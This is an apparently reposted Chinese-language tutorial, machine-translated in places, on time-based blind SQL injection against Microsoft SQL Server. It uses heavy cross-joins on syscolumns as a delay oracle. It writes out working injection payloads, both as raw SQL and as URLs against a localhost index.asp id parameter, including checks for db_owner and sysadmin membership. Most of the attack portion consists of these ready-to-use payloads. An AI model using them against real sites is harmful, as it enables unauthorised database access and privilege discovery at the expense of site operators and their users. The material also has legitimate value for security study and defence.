基于超时的MSSQL盲目注入[网络技术]
本文“基于超时的MSSQL盲目注入[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
作者:night
根源:www.54rk.cn
假定有这么一个文件,无论你怎么注入它页面内容都一样.但是他代码却确切存在注入点.
select * from table where columnid = $input_id
通过文件返回错误来注入是绝对不大概的.因为他页面内容始终一样.这样的漏洞页面绝对有的.
自己可以构造出来.
这时刻我们怎么注入列?
我们用 基于时间的盲目注入.
先看两条语句:
select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1
select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2
第一条语句绝对超时,网页在半小时内应当不会返回后果,第二条即刻就返回后果.
假如你测试后果跟我说的有出入,那么你就把
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
换成
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
一共100个,还不超时你的电脑就是外星的了.
好目前假定漏洞页面http://127.0.0.1/xml/mssql/index.asp?id=1
我们来这样注入:
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2
假如返回时间相差N多,那么绝对有注入.目前我们来判断权限.
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))
其他注入参考网上其他的教程了.
只要改正and 1=(SELECT IS_MEMBER('sysadmin'))就行.
因为假如你的条件不成立,那么
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就不会进入,假如你的条件成立
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就会履行完.
所以,假如网页超时,表示你的条件就成立.
你就猜中了信息.假如不超时,证明你的猜想条件是错误的.
----------关于这文章我已经公布好久了,但是就是没人给我一个反映..我去年写的
到本年一点反映都没有,我都不知道有没有错
以上是“基于超时的MSSQL盲目注入[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |